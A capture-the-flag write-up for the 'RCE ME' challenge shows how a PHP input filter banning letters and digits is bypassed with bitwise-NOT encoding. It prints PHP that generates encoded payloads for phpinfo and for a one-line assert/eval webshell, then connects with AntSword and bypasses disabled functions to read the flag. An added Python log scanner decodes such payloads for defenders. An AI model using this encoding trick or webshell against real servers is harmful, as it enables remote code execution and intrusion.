[极客大挑战 2019]RCE ME 1
2022-06-26 12:35:00 【『铁躯电芯』】
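First, open the challenge, which gives:

It turns out to be a code audit.
The code passed in cannot be longer than 40,
and it cannot contain the letters a to z in either case or the digits 1 to 10.
We can bypass this with characters that are outside this character set.
Either XOR or bitwise NOT (negation) can be used.
Here I use negation for the bypass
and execute phpinfo();
payload: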
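<?php
// Bitwise NOT turns every ASCII byte into a byte >= 0x80,
// so the encoded string contains no letters or digits
$c='phpinfo';
$d=urlencode(~$c);
echo $d;
?>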

Execute:

It turns out that some functions are restricted:

Write a one-line webshell:
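<?php
error_reporting(0);
// NOT-encode the function name, as in the phpinfo example
$a='assert';
$b=urlencode(~$a);
echo '(~'.$b.')';
// NOT-encode the argument string the same way
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo '(~'.$d.')';
?>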
Here we cannot use eval directly, because eval is a language construct rather than a PHP function, so it cannot be called as a variable function.
Instead we use assert to build the payload, but because of the PHP version we cannot directly construct <?php assert($_POST['a']);>; we need to call eval and splice it in as assert(eval($_POST[test]))

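Connect with AntSword,
but commands cannot be executed, and neither can cat flag.

Use an AntSword plugin for the bypass:


Click Start to enter:

Use readflag to get the flag: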
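
For defenders reviewing web logs, the negation encoding used in both payloads above is easy to reverse. The following is an added example, not part of the original writeup: it looks for `~`-prefixed runs of percent-encoded high bytes in a request's raw query string and inverts them back to ASCII. The function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# "~" followed by percent-encoded bytes >= 0x80, the shape urlencode(~$s) produces.
NOT_RUN = re.compile(r"~((?:%[89A-Fa-f][0-9A-Fa-f])+)")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Jun/2022:12:35:00 +0000] '
    '"GET /?code=(~%8F%97%8F%96%91%99%90)(); HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Jun/2022:12:35:09 +0000] '
    '"GET /?code=%28%7E%8f%97%8f%96%91%99%90%29%28%29%3B HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/Jun/2022:12:36:00 +0000] '
    '"GET /search?q=%E4%BD%A0%E5%A5%BD HTTP/1.1" 200 1024',
]


def decode_not_runs(raw_value):
    """Return ASCII strings hidden behind bitwise-NOT-encoded byte runs."""
    normalized = re.sub(r"%7[Ee]", "~", raw_value)  # "~" may arrive percent-encoded
    found = []
    for match in NOT_RUN.finditer(normalized):
        inverted = bytes(b ^ 0xFF for b in unquote_to_bytes(match.group(1)))
        # Heuristic: report only runs that invert to printable ASCII.
        if all(0x20 <= b < 0x7F for b in inverted):
            found.append(inverted.decode("ascii"))
    return found


def scan_log(lines):
    """Return (line_number, decoded_strings) for each request carrying such runs."""
    hits = []
    for number, line in enumerate(lines, start=1):
        request = REQUEST.search(line)
        if not request:
            continue
        query = request.group(1).partition("?")[2]  # raw, still percent-encoded
        decoded = decode_not_runs(query)
        if decoded:
            hits.append((number, decoded))
    return hits


if __name__ == "__main__":
    for number, decoded in scan_log(SAMPLE_LOG):
        print(f"line {number}: hidden identifiers {decoded}")
```

The scan must run on the raw query string, before any URL decoding, because the high bytes are not valid UTF-8 and a decoded copy of the log would have replaced them.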
